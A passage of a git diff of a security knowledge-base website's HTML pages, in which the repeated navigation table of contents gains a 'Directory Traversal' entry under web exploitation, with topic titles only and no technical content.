      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -251,22 +251,6 @@

Further Readi - - diff --git a/docs/Cyberclopaedia/Contributing.html b/docs/Cyberclopaedia/Contributing.html index 1845b937..dba071fe 100644 --- a/docs/Cyberclopaedia/Contributing.html +++ b/docs/Cyberclopaedia/Contributing.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -205,22 +205,6 @@

Licensing

- - diff --git a/docs/Cyberclopaedia/License.html b/docs/Cyberclopaedia/License.html index 678be2b3..359bcafa 100644 --- a/docs/Cyberclopaedia/License.html +++ b/docs/Cyberclopaedia/License.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -179,22 +179,6 @@

The Cyberclopaedia

- - diff --git a/docs/Cyberclopaedia/index.html b/docs/Cyberclopaedia/index.html index 63e6d75b..4a036baf 100644 --- a/docs/Cyberclopaedia/index.html +++ b/docs/Cyberclopaedia/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
